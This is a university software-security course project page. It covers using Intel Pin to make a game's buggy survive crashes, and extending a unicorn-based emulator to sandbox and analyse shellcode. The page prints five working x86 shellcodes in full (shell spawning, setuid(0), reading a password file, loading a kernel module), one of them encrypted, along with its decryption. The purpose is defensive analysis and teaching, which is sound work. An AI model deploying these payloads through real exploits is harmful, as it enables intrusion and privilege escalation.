---
title: 'Project'
tags: enee759-spring24
---

* Please use **[ELMS-Canvas](https://elms.umd.edu/)** to submit your projects.
* Deadlines are posted on [ELMS-Canvas](https://elms.umd.edu/).
* Feedback will be available after grading.

## Preparation: Installing Intel Pin
* Follow these steps if your Linux system does not have Intel Pin installed. (If you downloaded the VirtualBox VM, Pin is already installed, so skip this part.)
* Download https://yonghwi-kwon.github.io/class/softsec/pin/pin.sh and run it.

```shell
$ cd
$ wget https://yonghwi-kwon.github.io/class/softsec/pin/pin.sh
$ chmod +x pin.sh
$ ./pin.sh
```

1. The script downloads, unzips, and installs Pin.
2. After the installation, close the terminal and open a new one.
3. If you can run the `pin` binary in your home folder, the installation was successful.

### Documents for Pin
* [**Intel Pin for Perturbing Program Executions: Examples**](https://hackmd.io/@yonghwikwon/HJoOIh9y5)
* [Please see this page to turn off ASLR (Address Space Layout Randomization)](https://hackmd.io/@yonghwikwon/Hkrqi7756).
* Intel Official Documents: [Pin User Manual](https://software.intel.com/sites/landingpage/pintool/docs/98484/Pin/html/index.html), [Pin API Reference](https://software.intel.com/sites/landingpage/pintool/docs/98484/Pin/html/group__API__REF.html)

## Project 1: Zombie Moon-buggy
### Background
<iframe src="https://drive.google.com/file/d/1wECnH-CmQCr9Llj4mimmKpEbUEFbz4zX/preview" width="640" height="380" allow="autoplay" style="border:2px solid gray;"></iframe>

* [Watch This Video](https://drive.google.com/file/d/1wECnH-CmQCr9Llj4mimmKpEbUEFbz4zX/view?usp=sharing)

You are given the Moon-buggy game. Your goal is to use Intel Pin to make the moon buggy keep going even after crashes.

### Full Description
First, [watch the video](https://drive.google.com/file/d/1wECnH-CmQCr9Llj4mimmKpEbUEFbz4zX/view?usp=sharing). It shows **two moon buggy executions**.
* The first execution is the original game without any execution perturbation. You will see that the buggy crashes if you do not jump in time to avoid the holes in the ground.
* The second execution is the original game with a Pin tool perturbing the execution to disable the crash detection logic. It shows that **even after it crashes**, **the buggy keeps going**.
    * Even though the buggy looks damaged, it still functions (e.g., it keeps going and firing).

You need to figure out how to make your own Pin tool that achieves the same goal: make the moon buggy keep going after crashes. You are supposed to figure this out by yourself by analyzing the source code.
* Hints: You need to look at the "**crash detection**" mechanism. In other words, focus on **how the program detects that the buggy ran into a hole** and **crashes** the buggy.

### Resources
* [Download Moon-buggy Program](https://yonghwi-kwon.github.io/class/softsec/project/moon-buggy.zip)
* How to compile and run the moon-buggy program
    * **Download** and **extract** it.
    * **Install** the required **packages**: **autoconf**, **automake**, **texinfo**, **libncurses5-dev**, **libncursesw5-dev**
    ```shell
    $ sudo apt-get install autoconf automake texinfo
    $ sudo apt-get install libncurses5-dev libncursesw5-dev
    ```
    * **Run** the following **commands**
    ```shell
    $ ./autogen.sh
    $ ./configure
    $ make
    ```
* Installation Script: https://yonghwi-kwon.github.io/class/softsec/project/prj1.sh
    * The script below creates a directory and downloads/unzips all the required files.
    ```shell
    $ wget https://yonghwi-kwon.github.io/class/softsec/project/prj1.sh
    $ chmod +x prj1.sh
    $ ./prj1.sh
    ```

### Extra Challenge
The buggy has a laser that can be fired with the `a` key. Each time you fire it, points are deducted from your game score. Can you make it increase the score instead? (e.g., every time you use the laser, you gain 10000 points)
* Hints: You need to **find out** how the **score** is **modified** when the laser is fired.

### What to submit
1. Your Pin tool **code** (please submit a single C/C++ file).
2. A **report** that includes (1) high-level **descriptions** of how **your Pin tool** works, (2) the **instructions** and **memory locations** (i.e., **variables**) you changed to make the buggy invincible, as identified via manual analysis, and (3) the **implementation strategies** of your Pin tool.

## Project 2: Emulating Partial Program (Shellcode)
### Background
**Remote exploitation** of a vulnerable program is a common tactic in cyber attacks. Typically, an attacker sends **maliciously crafted inputs** to a vulnerable program. Such an input often consists of two parts: a **malicious payload**, which is executed after a successful exploitation, and an **input that exploits the vulnerability** to hijack the control flow and redirect it to the injected payload.

![image](https://hackmd.io/_uploads/Hki_oh9np.png)

The above figure shows an example scenario.
* First, an attacker sends a malicious payload to a vulnerable program, typically through a legitimate channel.
    * Any code that allocates memory and fills it with data from the attacker can be used.
    * Attackers typically repeat this process many times to spread many instances of the malicious payload across memory.
* Second, a vulnerability-triggering input is sent to the program to trigger the vulnerability and hijack the control flow so that it executes the injected payload.
* Then, the program runs the injected malicious payload (shown in the green boxes), which creates a `/bin/sh` process.

Since the malicious payload is essentially the bytes of a sequence of instructions, it can do anything. In practice, there are two typical forms of malicious payload: shellcode and ROP. In this project, we focus only on shellcode. The following website gives a few examples of popular shellcode: http://shell-storm.org/shellcode/.

### What is this project about?
Assume that you have obtained a potentially malicious payload (e.g., from network logs) and would like to know what it does. Executing it on a real machine or VM is a viable option, but it can harm the entire VM or machine if the exploitation succeeds. **Sandboxing** is a technique that runs a program while preventing it from doing any harm to the host system. In practice, sandboxing is commonly used to execute potentially malicious code because it lets you observe malicious actions without harming the host system.

This project asks you to create a **sandboxing tool** that **executes payloads** safely **using code emulation techniques**. Specifically, given a sequence of code bytes (i.e., instructions), you **run them** and **report what actions they perform** (e.g., making a system call, performing a particular computation, etc.).

### Given five shellcodes
You are given the shellcode examples below. Your goal is to make your program properly interpret their executions (e.g., which system calls were made with which arguments):
* Example 1: `CODE_EXAMPLE1`

```
\x6a\x30\x58\x6a\x05\x5b\xeb\x05\x59\xcd\x80\xcc\x40\xe8\xf6\xff\xff\xff\x99\xb0
\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x54\xeb\xe1
```

* Example 2: `CODE_EXAMPLE2`

```
\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80
```

* Example 3: `CODE_EXAMPLE3`

```
\x31\xc0\x50\x50\xb0\x17\xcd\x80\xeb\x1f\x5e\x50\x68\x2f\x63\x61\x74\x68\x2f\x62
\x69\x6e\x89\xe3\x50\x56\x53\x89\xe2\x50\x52\x53\xb0\x0b\x50\xcd\x80\x50\x50\xcd
\x80\xe8\xdc\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x73\x74\x65\x72\x2e\x70\x61
\x73\x73\x77\x64
```

* Example 4: `CODE_EXAMPLE4`

```
\xeb\x2c\x5e\x31\xc0\xb0\x17\x50\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f
\x2f\x62\x69\x89\xe3\x50\x66\x68\x2d\x63\x89\xe7\x50\x56\x57\x53\x89\xe7\x50\x57
\x53\x50\xb0\x0b\xcd\x80\xe8\xcf\xff\xff\xff\x2f\x73\x62\x69\x6e\x2f\x6b\x6c\x64
\x6c\x6f\x61\x64\x20\x2f\x74\x6d\x70\x2f\x6f\x2e\x6f
```

* Example 5: `CODE_EXAMPLE5`

```
\x31\xd2\xeb\x0e\x31\xdb\x5b\xb1\x19\x83\x2c\x1a\x01\x42\xe2\xf9\xeb\x05\xe8\xed
\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x32\xdc\x8a\xe4
\x51\x55\x54\x51\xb1\x0c\xce\x81
```

### Given program
You are given a program, `emul.py`, which leverages the unicorn framework to run a given shellcode and report the executed instructions and their results.

#### Already supported system calls
The program can already execute simple shellcode that does not cause any errors and uses only a few system calls.

| Syscall Number | Syscall Name |
| -------- | -------- |
| 1 | sys_exit |
| 4 | sys_write |
| 11 | sys_execve |
| 48 | sys_signal |

#### Already supported code examples
The program can already run the first two shellcode samples: `CODE_EXAMPLE1` and `CODE_EXAMPLE2`. The screenshot below shows `CODE_EXAMPLE1` running with the provided program:
> ![](https://i.imgur.com/P1ZcOfF.png)

The program is configured as follows:
* The shellcode starts at address `0x1000000`
* The stack starts at address `0x1200000`
* Shellcode example 1 is 39 bytes long, and many of those bytes are not executed in the first run.
    * The figure below visualizes the executed code (in red text/box). Bytes underlined together belong to one instruction. Arrows indicate control flow changes.
    * Observe that many instructions are still uncovered (they will be handled by the `continue` command below).
    * > ![](https://i.imgur.com/efzGtxj.png)
* The program already supports the `continue` command, which executes the remaining instructions that have not been covered yet.
    * > ![](https://i.imgur.com/pONO63e.png)
    * Running with `continue` two more times gives the following output, meaning that there are *no remaining instructions to execute*.
    * > ![](https://i.imgur.com/KqbRpWm.png)
    * To understand how `continue` is implemented, search for the `inst_remain` variable in `project3.py` and check the related code.
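
As a rough illustration of the control-flow arrows described above, the sketch below computes where the two short jumps and the call in `CODE_EXAMPLE1` land. It is not part of `emul.py`: the helper names `rel8_target` and `rel32_target` and the constant `BASE` are made up for this example, and the offsets 6, 13, and 37 were found by reading the bytes by hand.

```python
import struct

BASE = 0x1000000  # shellcode load address stated in the configuration above

CODE_EXAMPLE1 = (
    b"\x6a\x30\x58\x6a\x05\x5b\xeb\x05\x59\xcd\x80\xcc\x40\xe8\xf6\xff\xff\xff\x99\xb0"
    b"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x54\xeb\xe1"
)


def rel8_target(code, offset):
    """Target offset of a 2-byte short jump (opcode + signed 8-bit displacement)."""
    (disp,) = struct.unpack_from("<b", code, offset + 1)
    return offset + 2 + disp  # displacement is relative to the next instruction


def rel32_target(code, offset):
    """Target offset of a 5-byte near call (opcode + signed 32-bit displacement)."""
    (disp,) = struct.unpack_from("<i", code, offset + 1)
    return offset + 5 + disp


print(len(CODE_EXAMPLE1))                             # 39
print(hex(BASE + rel8_target(CODE_EXAMPLE1, 6)))      # 0x100000d (jmp -> call)
print(hex(BASE + rel32_target(CODE_EXAMPLE1, 13)))    # 0x1000008 (call -> pop ecx)
print(hex(BASE + rel8_target(CODE_EXAMPLE1, 37)))     # 0x1000008 (final jmp -> pop ecx)
```

Both the call and the final jump land on the same `pop ecx; int 0x80` sequence, which is why a single straight-line run cannot cover every byte of the shellcode.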
#### Not supported examples
While Code Examples 1 and 2 are already supported, **Examples 3, 4, and 5** are **not** supported correctly. Your goal is to add code to support them. Here is the list of challenges and potential solutions.

#### Example 3 and 4
* System call 0x17 is not supported.
    * > ![](https://i.imgur.com/0qy1X5s.png)
    * 0x17 is SYS_SETUID. It takes a single argument, which is passed via the EBX register.
* [Optional] System call 0x0 is not supported.
    * > ![](https://i.imgur.com/3Qr8EZO.png)
    * It is up to you whether to support this. Simply adding an `elif` branch for system call 0 that prints a message (not an error message) would be sufficient.
* The instructions below are in fact a string, which was already used in a previous system call. When you detect that a string is being executed as instructions, print a message saying so; there is no need to analyze the outcome.
    * > ![](https://i.imgur.com/fpDtgyv.png)
    * Expected output (your goal is to change the program to behave as in the screenshot below, printing `Are we executing a string?` when an address that is known to hold a string is executed):
    * > ![](https://i.imgur.com/KJAyaAd.png)

#### Example 5
Example 5's shellcode is encrypted. The shellcode is shown below.

```asm
0:  31 d2               xor    edx,edx
2:  eb 0e               jmp    0x12
4:  31 db               xor    ebx,ebx
6:  5b                  pop    ebx
7:  b1 19               mov    cl,0x19
9:  83 2c 1a 01         sub    DWORD PTR [edx+ebx*1],0x1
d:  42                  inc    edx
e:  e2 f9               loop   0x9
10: eb 05               jmp    0x17
12: e8 ed ff ff ff      call   0x4
17: 32 c1               xor    al,cl
19: 51                  push   ecx
1a: 69 30 30 74 69 69   imul   esi,DWORD PTR [eax],0x69697430
20: 30 63 6a            xor    BYTE PTR [ebx+0x6a],ah
23: 6f                  outs   dx,DWORD PTR ds:[esi]
24: 32 dc               xor    bl,ah
26: 8a e4               mov    ah,ah
28: 51                  push   ecx
29: 55                  push   ebp
2a: 54                  push   esp
2b: 51                  push   ecx
2c: b1 0c               mov    cl,0xc
2e: ce                  into
2f: 81                  .byte 0x81
```

Observe the execution flow: 0 -> 2 -> 12 -> 4 -> 6 -> 7 -> 9 -> d -> ... In particular, see the loop between `9` and `e`.
```asm
9:  83 2c 1a 01         sub    DWORD PTR [edx+ebx*1],0x1
d:  42                  inc    edx
e:  e2 f9               loop   0x9
```

The loop performs a very simple decryption (value = value - 1), where the target buffer of the decryption is the code starting at `17`.

```asm
0:  31 d2           xor    edx,edx
2:  eb 0e           jmp    0x12 ---------------------------|
4:  31 db           xor    ebx,ebx <-----------------------|--|
6:  5b              pop    ebx                             |  |
7:  b1 19           mov    cl,0x19                         |  |
9:  83 2c 1a 01     sub    DWORD PTR [edx+ebx*1],0x1       |  |
d:  42              inc    edx                             |  |
e:  e2 f9           loop   0x9                             |  |
10: eb 05           jmp    0x17                            |  |
12: e8 ed ff ff ff  call   0x4 <---------------------------|--|
--------------------------------------------
17: 32 c1           xor    al,cl
...
```

If we manually apply the decryption, we get the following code:

```asm
0:  31 d2               xor    edx,edx
2:  eb 0e               jmp    0x12
4:  31 db               xor    ebx,ebx
6:  5b                  pop    ebx
7:  b1 19               mov    cl,0x19
9:  83 2c 1a 01         sub    DWORD PTR [edx+ebx*1],0x1
d:  42                  inc    edx
e:  e2 f9               loop   0x9
10: eb 05               jmp    0x17
12: e8 ed ff ff ff      call   0x4
--------------------------------------------
17: 31 c0               xor    eax,eax
19: 50                  push   eax
1a: 68 2f 2f 73 68      push   0x68732f2f
1f: 68 2f 62 69 6e      push   0x6e69622f
24: 31 db               xor    ebx,ebx
26: 89 e3               mov    ebx,esp
28: 50                  push   eax
29: 54                  push   esp
2a: 53                  push   ebx
2b: 50                  push   eax
2c: b0 0b               mov    al,0xb
2e: cd 80               int    0x80
```

Now, your goal is to improve the program to handle this code. If you run the `project3.py` that we have modified so far, you will get the following screenshot.
> ![](https://i.imgur.com/DDuR968.png)

Currently, the program stops the analysis if it encounters the same instruction twice within the same execution. See the code below in `hook_code()`.

```python=
# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    ...
    elif address in inst_executed_local:
        if address in cnt_repeated:
            cnt_repeated[address] = cnt_repeated[address] + 1
        else:
            cnt_repeated[address] = 1
        output = "Already covered (stop analysis):: addr %x (repeated: %d)" % (address, cnt_repeated[address])
        out(output)
        uc.emu_stop()
        return
```

This code terminates the analysis (`uc.emu_stop()`) when any instruction is executed more than once (see the condition at line 4). As we saw, the decryption requires a loop, so you have to allow instructions to execute repeatedly. In this homework, you are asked to allow each instruction to run up to 100 times. After you do, we get the following result:
> ![](https://i.imgur.com/gM4A0Ef.png)

Now we can execute the first system call, but `continue` for the decrypted code does not work.

![](https://i.imgur.com/tnRtUk7.png)

Observe that the code shown is the original code, which has not been decrypted. This is because when we run the program again, we lose the previous memory state that holds the decrypted code. The last piece of this project is to save the memory state at the end of the execution and load it in the next run. The final outcome should allow you to run the program twice more, covering SYS_EXECVE twice with different arguments.
> ![](https://i.imgur.com/lgv8Zhu.png)

### What to do
1. Download the unicorn framework.
2. Download `emul.py` and `emul_util.py`. Put them in the `bindings` folder.
    * [emul.py](https://yonghwi-kwon.github.io/class/softsec/project/emul.py)
    * [emul_util.py](https://yonghwi-kwon.github.io/class/softsec/project/emul_util.py)
3. Follow the above description and the lecture video to improve the program so that it can handle all five example shellcodes.

### Resources
* Installation Script: https://yonghwi-kwon.github.io/class/softsec/project/prj2.sh
    * The script below creates a directory and downloads/unzips all the required files.
```shell
$ wget https://yonghwi-kwon.github.io/class/softsec/project/prj2.sh
$ chmod +x prj2.sh
$ ./prj2.sh
```

### What to submit
1. Final source code
2. Screenshots of each example shellcode running correctly on your terminal.
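
For reference, the Example 5 decryption loop described earlier can be checked by hand with a few lines of plain Python. This is only a sketch and not part of `emul.py`: the names `SHELLCODE` and `decrypt` are hypothetical, and it assumes that `ebx` holds offset `0x17` (the return address pushed by `call 0x4`), that `edx` starts at 0, and that the upper bits of `ecx` are zero so the loop runs `0x19` times.

```python
# CODE_EXAMPLE5 split into the decoder stub and the encrypted body.
SHELLCODE = bytes.fromhex(
    # decoder stub, offsets 0x00-0x16
    "31 d2 eb 0e 31 db 5b b1 19 83 2c 1a 01 42 e2 f9 eb 05 e8 ed ff ff ff "
    # encrypted body, offsets 0x17-0x2f
    "32 c1 51 69 30 30 74 69 69 30 63 6a 6f 32 dc 8a e4 51 55 54 51 b1 0c ce 81"
)


def decrypt(code, start=0x17, count=0x19):
    """Mimic `sub DWORD PTR [edx+ebx], 1; inc edx; loop` on a copy of the code."""
    # Three zero bytes of padding keep the last 4-byte accesses in range.
    mem = bytearray(code) + bytearray(3)
    for edx in range(count):
        addr = start + edx
        value = int.from_bytes(mem[addr:addr + 4], "little")
        mem[addr:addr + 4] = ((value - 1) & 0xFFFFFFFF).to_bytes(4, "little")
    return bytes(mem[:len(code)])


decoded = decrypt(SHELLCODE)
print(decoded[0x17:].hex(" "))
# 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 31 db 89 e3 50 54 53 50 b0 0b cd 80
print(decoded[0x1b:0x1f], decoded[0x20:0x24])  # b'//sh' b'/bin'
```

The printed bytes match the manually decrypted listing in the Example 5 section. Because none of the encrypted bytes is zero, the 32-bit subtraction never borrows into a neighbouring byte, so each byte is simply decremented by one.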